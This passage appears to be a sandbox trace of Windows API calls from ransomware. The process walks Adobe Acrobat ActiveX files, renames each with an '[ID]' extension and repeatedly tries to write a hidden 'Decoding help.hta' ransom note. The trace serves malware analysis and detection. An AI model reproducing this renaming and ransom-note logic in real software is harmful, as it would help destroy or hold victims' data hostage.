Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB" [0046.514] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB" [0046.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB.[ID]g9uZrLhJaygpwRm1[ID]" [0046.514] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ptb"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.PTB.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.ptb.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.514] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d938760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.RUM", cAlternateFileName="")) returned 1 [0046.514] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.514] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.514] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.514] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.514] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.514] CloseHandle (hObject=0xffffffff) returned 0 [0046.514] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.514] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.RUM") returned 1 [0046.515] lstrlenW (lpString="AcroPDF.RUM") returned 11 [0046.515] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.515] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.515] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.RUM" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM" [0046.515] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM" [0046.515] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM.[ID]g9uZrLhJaygpwRm1[ID]" [0046.515] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rum"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUM.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rum.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.515] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d938760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.RUS", cAlternateFileName="")) returned 1 [0046.515] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.515] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.515] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.515] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.515] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.515] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.515] CloseHandle (hObject=0xffffffff) returned 0 [0046.515] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.515] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.RUS") returned 1 [0046.515] lstrlenW (lpString="AcroPDF.RUS") returned 11 [0046.515] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.516] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.RUS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS" [0046.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS" [0046.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS.[ID]g9uZrLhJaygpwRm1[ID]" [0046.516] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rus"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.RUS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.rus.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.516] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c36ae00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d938760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9c36ae00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.SKY", cAlternateFileName="")) returned 1 [0046.516] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.516] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.516] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.516] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.516] CloseHandle (hObject=0xffffffff) returned 0 [0046.516] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.516] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.SKY") returned 1 [0046.516] lstrlenW (lpString="AcroPDF.SKY") returned 11 [0046.516] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.516] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.516] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.SKY" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY" [0046.517] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY" [0046.517] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY.[ID]g9uZrLhJaygpwRm1[ID]" [0046.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sky"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SKY.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.sky.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.544] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b058100, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d938760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9b058100, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.SLV", cAlternateFileName="")) returned 1 [0046.544] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.544] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.544] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.545] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.545] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.545] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.545] CloseHandle (hObject=0xffffffff) returned 0 [0046.545] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.545] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.SLV") returned 1 [0046.545] lstrlenW (lpString="AcroPDF.SLV") returned 11 [0046.545] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.545] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.545] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.SLV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV" [0046.545] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV" [0046.545] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV.[ID]g9uZrLhJaygpwRm1[ID]" [0046.545] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.slv"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SLV.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.slv.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.545] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8c6340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.SUO", cAlternateFileName="")) returned 1 [0046.545] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.545] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.546] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" [0046.546] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta")) returned 0xffffffff [0046.546] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0046.546] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2141fcf8, lpOverlapped=0x0) returned 0 [0046.546] CloseHandle (hObject=0xffffffff) returned 0 [0046.546] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0046.546] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AcroPDF.SUO") returned 1 [0046.546] lstrlenW (lpString="AcroPDF.SUO") returned 11 [0046.546] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" [0046.546] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*") returned 65 [0046.546] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\", lpString2="AcroPDF.SUO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO" [0046.546] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO" [0046.546] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO.[ID]g9uZrLhJaygpwRm1[ID]" [0046.546] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.suo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\AcroPDF.SUO.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\acrobat\\activex\\acropdf.suo.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0046.596] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x2141fd30 | out: lpFindFileData=0x2141fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d8a01e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4c400, dwReserved0=0x0, dwReserved1=0x0, cFileName="AcroPDF.SVE", cAlternateFileName="")) returned 1 [0046.596] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\Acrobat\\ActiveX\\*.*" | out: 